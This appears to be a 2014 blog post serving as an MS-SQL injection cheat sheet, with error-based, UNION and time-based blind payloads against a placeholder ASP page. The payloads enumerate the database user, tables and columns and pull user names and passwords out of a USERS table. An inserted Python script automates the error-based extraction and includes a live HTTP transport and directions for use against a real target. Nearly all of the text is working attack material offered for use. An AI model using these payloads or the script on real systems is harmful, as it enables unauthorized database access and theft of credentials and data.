Thursday, January 9, 2014

BASIC DETECTION OF CODE INJECTION IN MS-SQL


MS-SQL INJECTION - BASIC DETECTION



     

Integer Injection:

http://[site]/page.asp?id=1 having 1=1--



Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.



String Injection:

http://[site]/page.asp?id=x' having 1=1--



Column '[COLUMN NAME]' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.




ERROR SQL INJECTION - EXTRACT DATABASE USER

       

http://[site]/page.asp?id=1 or 1=convert(int,(USER))--




Syntax error converting the nvarchar value '[DB USER]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT DATABASE NAME

       

http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME()))--



Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT DATABASE VERSION

       

http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))--



Syntax error converting the nvarchar value '[DB VERSION]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT SERVER NAME

       

http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))--



Syntax error converting the nvarchar value '[SERVER NAME]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 1st  DATABASE TABLE

     

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--



Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 2nd DATABASE TABLE

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and name>'TABLE-NAME-1'))--



Syntax error converting the nvarchar value '[TABLE NAME 2]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 3rd DATABASE TABLE

     

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and name>'TABLE-NAME-2'))--



Syntax error converting the nvarchar value '[TABLE NAME 3]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME

     

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--



Syntax error converting the nvarchar value '[COLUMN NAME  1]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-1'))--



Syntax error converting the nvarchar value '[COLUMN NAME 2]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1' and column_name>'COLUMN-NAME-2'))--



Syntax error converting the nvarchar value '[COLUMN NAME  3]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))--



Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW

     

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1))--



Syntax error converting the nvarchar value '[FIELD 2 VALUE]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 3rd FIELD OF 1st ROW

     

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-3 from TABLE-NAME-1))--



Syntax error converting the nvarchar value '[FIELD 3 VALUE]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE') order by COLUMN-NAME-1 desc))--



Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 2ND ROW]' to a column of data type int.




ERROR SQL INJECTION - EXTRACT 1st FIELD OF 3rd ROW

       

http://[site]/page.asp?id=1  or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in ('FIELD-1-VALUE','FIELD-2-VALUE') order by COLUMN-NAME-1 desc))--



Syntax error converting the nvarchar value '[FIELD 1 VALUE OF 3RD ROW]' to a column of data type int.


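The error-based walk above (one request per table or column, each re-issued with `name>'<last value>'`) is easy to automate. The script below is an added example, not code from the original post: it builds the page's `convert(int,(...))` payloads, parses the leaked value out of both wordings SQL Server has used for the conversion error (the SQL Server 2000 text quoted above, and the "Conversion failed when converting the nvarchar value ..." text of 2005 and later), and adds ORDER BY so the `>` pagination is well defined (TOP 1 without ORDER BY has no guaranteed order, and the walk only visits names in the collation's ascending order). `page.asp?id=` is the page's own placeholder; `FakePage` is a constructed offline stand-in so the script runs without a target, and `http_fetch` is the hypothetical real transport. `sysobjects` is the legacy view the page uses; on SQL Server 2005+ `sys.tables` is the supported catalog view.

```python
import re
from typing import Callable, Iterator, List, Optional, Set

# The two wordings SQL Server has used for the int-conversion error (msg 245):
# the SQL Server 2000 text quoted on this page, and the 2005+ text.
ERROR_PATTERNS = [
    re.compile(r"Syntax error converting the nvarchar value '(.*?)' to a column of data type int"),
    re.compile(r"Conversion failed when converting the nvarchar value '(.*?)' to data type int"),
]


def leaked_value(body: str) -> Optional[str]:
    """Pull the string the server leaked inside its conversion error; None if no error."""
    for pat in ERROR_PATTERNS:
        m = pat.search(body)
        if m:
            return m.group(1)
    return None


def sql_quote(s: str) -> str:
    """Double embedded single quotes so a recovered value is safe inside a '...' literal."""
    return s.replace("'", "''")


def convert_payload(subquery: str) -> str:
    """Value of the id parameter, in the page's 'or 1=convert(int,(...))--' form."""
    return f"1 or 1=convert(int,({subquery}))--"


def walk_values(fetch: Callable[[str], str], col: str, source: str, where: str) -> Iterator[str]:
    """Yield every value of `col` in `source` matching `where`, one request per row.

    Each request asks for TOP 1 ... where col > <last value seen> (the page's 2nd/3rd
    table trick), with ORDER BY added so the '>' pagination is well defined.
    """
    last: Optional[str] = None
    seen: Set[str] = set()
    while True:
        cond = where if last is None else f"{where} and {col}>'{sql_quote(last)}'"
        subquery = f"select top 1 {col} from {source} where {cond} order by {col}"
        value = leaked_value(fetch(convert_payload(subquery)))
        if value is None or value in seen:
            return                 # no error leaked: the walk is exhausted
        seen.add(value)
        yield value
        last = value


def enumerate_user_tables(fetch: Callable[[str], str]) -> List[str]:
    """All user tables (xtype 'U') through sysobjects, the legacy view the page uses."""
    return list(walk_values(fetch, "name", "sysobjects", "xtype=char(85)"))


def enumerate_columns(fetch: Callable[[str], str], db: str, table: str) -> List[str]:
    """Column names of one table; the database name is bracketed in case it has hyphens."""
    return list(walk_values(fetch, "column_name", f"[{db}].information_schema.columns",
                            f"table_name='{sql_quote(table)}'"))


def http_fetch(base_url: str) -> Callable[[str], str]:
    """Real transport for page.asp?id=<payload> (hypothetical URL). ASP error pages
    usually arrive as HTTP 500, so the body of an HTTPError is read too."""
    import urllib.error, urllib.parse, urllib.request

    def fetch(id_param: str) -> str:
        url = f"{base_url}?id={urllib.parse.quote(id_param)}"
        try:
            with urllib.request.urlopen(url, timeout=15) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.read().decode("utf-8", "replace")
    return fetch


class FakePage:
    """Offline stand-in for page.asp (constructed data, no real host): answers the
    TOP 1 / name>'last' pattern the walker emits over a canned sysobjects, using the
    SQL Server 2005+ error text, and a plain page once nothing is left."""

    def __init__(self, table_names: List[str]):
        self.rows = sorted(table_names)
        self.requests = 0

    def fetch(self, id_param: str) -> str:
        self.requests += 1
        m = re.search(r"name>'((?:[^']|'')*)'", id_param)
        floor = m.group(1).replace("''", "'") if m else None
        remaining = [r for r in self.rows if floor is None or r > floor]
        if not remaining:
            return "<html><body>page rendered normally</body></html>"
        return (f"Conversion failed when converting the nvarchar value "
                f"'{remaining[0]}' to data type int.")


if __name__ == "__main__":
    page = FakePage(["USERS", "ORDERS", "CUSTOMERS", "O'REILLY"])
    print(enumerate_user_tables(page.fetch), "in", page.requests, "requests")
```

Against a real target, replace `page.fetch` with `http_fetch("http://[site]/page.asp")`; the walk stops as soon as a response carries no conversion error, so a WAF page or a generic error handler that hides the message ends it early rather than looping.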

##########################

# MS-SQL UNION Injection #

##########################

UNION SQL INJECTION - DETECTION

     

Integer Injection:

http://[site]/page.asp?id=1 UNION SELECT ALL 1--



All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.



http://[site]/page.asp?id=1 UNION SELECT ALL 1,2--



All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.



http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3--



All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.



http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4--



NO ERROR (the original query has 4 columns)

If putting a string in a position later raises a conversion error, that column is not a string type: pad the other positions with NULL, which unions with any type, and try the string in each position in turn.




UNION SQL INJECTION - EXTRACT DATABASE USER

       

http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4--



[DB USER]




UNION SQL INJECTION - EXTRACT DATABASE NAME

       

http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME(),3,4--



[DB NAME]




UNION SQL INJECTION - EXTRACT DATABASE VERSION

       

http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4--



[DB VERSION]




UNION SQL INJECTION - EXTRACT SERVER NAME

       

http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4--



[SERVER NAME]




UNION SQL INJECTION - EXTRACT DATABASE TABLES

     

http://[site]/page.asp?id=1  UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--



[TABLE NAME 1]




UNION SQL INJECTION - EXTRACT TABLE COLUMN NAMES

     

http://[site]/page.asp?id=1  UNION SELECT ALL 1,column_name,3,4 from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'--



[COLUMN NAME  1]




UNION SQL INJECTION - EXTRACT 1st FIELD

       

http://[site]/page.asp?id=1  UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from TABLE-NAME-1--



[FIELD 1 VALUE]




UNION SQL INJECTION - EXTRACT 2nd FIELD

     

http://[site]/page.asp?id=1  UNION SELECT ALL 1,COLUMN-NAME-2,3,4 from TABLE-NAME-1--



[FIELD 2 VALUE]




UNION SQL INJECTION - EXTRACT 3rd FIELD

     

http://[site]/page.asp?id=1  UNION SELECT ALL 1,COLUMN-NAME-3,3,4 from TABLE-NAME-1--



[FIELD 3 VALUE]



##########################

# MS-SQL Blind Injection #

##########################

BLIND SQL INJECTION - DETECTION

     

Integer Injection:

http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds)



String Injection:

http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'-- (+10 seconds)




BLIND SQL INJECTION - EXTRACT DATABASE USER

       

3 - Total Characters

http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)



D  - 1st Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)


B - 2nd Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)


O - 3rd Character

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)



Database User = DBO




BLIND SQL INJECTION - EXTRACT DATABASE NAME

       

http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),7,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),8,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)



Database Name = PRO-DB-1




BLIND SQL INJECTION - EXTRACT 1st  DATABASE TABLE

     

http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 NAME from sysobjects where xtype='U'))=5) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Table Name = USERS




BLIND SQL INJECTION - EXTRACT 2nd DATABASE TABLE

       

http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'))=6) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),1,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),2,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),3,1)))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),4,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),5,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),6,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Table Name = ORDERS




BLIND SQL INJECTION - EXTRACT 3rd DATABASE TABLE

       

http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'))=9) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),1,1)))=99) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),2,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),3,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),4,1)))=116) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),5,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),6,1)))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),7,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),8,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),9,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Table Name = CUSTOMERS




BLIND SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME

       

http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS'))=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS'),1,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS'),2,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS'),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Column Name = USER




BLIND SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME

       

http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'USER'))=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'USER'),1,1)))=112) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'USER'),2,1)))=97) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'USER'),3,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'USER'),4,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Column Name = PASS




BLIND SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME

       

http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'PASS'))=2) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'PASS'),1,1)))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from [PRO-DB-1].information_schema.columns where table_name='USERS' and column_name>'PASS'),2,1)))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Column Name = ID




BLIND SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW

     

http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 [USER] from USERS))=5) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 [USER] from USERS),1,1)))=97) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 [USER] from USERS),2,1)))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 [USER] from USERS),3,1)))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 [USER] from USERS),4,1)))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 [USER] from USERS),5,1)))=110) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Field Data = ADMIN




BLIND SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW

     

http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 PASS from USERS))=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),1,1))=49) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),2,1))=50) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),3,1))=51) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Field Data = 123




BLIND SQL INJECTION - EXTRACT 3rd FIELD OF 1st ROW

     

http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 ID from USERS))=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID from USERS),1,1))=49) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID from USERS),2,1))=48) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID from USERS),3,1))=48) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Field Data = 100




BLIND SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW

       

http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 [USER] from USERS where [USER] NOT in ('ADMIN') order by [USER] desc))=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 [USER] from USERS where [USER] NOT in ('ADMIN') order by [USER] desc),1,1)))=106) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 [USER] from USERS where [USER] NOT in ('ADMIN') order by [USER] desc),2,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 [USER] from USERS where [USER] NOT in ('ADMIN') order by [USER] desc),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Field Data = JOE




BLIND SQL INJECTION - EXTRACT 1st FIELD OF 3rd ROW

       

http://[site]/page.asp?id=1; IF (LEN((SELECT TOP 1 [USER] from USERS where [USER] NOT in ('ADMIN','JOE') order by [USER] desc))=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 [USER] from USERS where [USER] NOT in ('ADMIN','JOE') order by [USER] desc),1,1)))=106) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 [USER] from USERS where [USER] NOT in ('ADMIN','JOE') order by [USER] desc),2,1)))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 [USER] from USERS where [USER] NOT in ('ADMIN','JOE') order by [USER] desc),3,1)))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)



Field Data = JIM




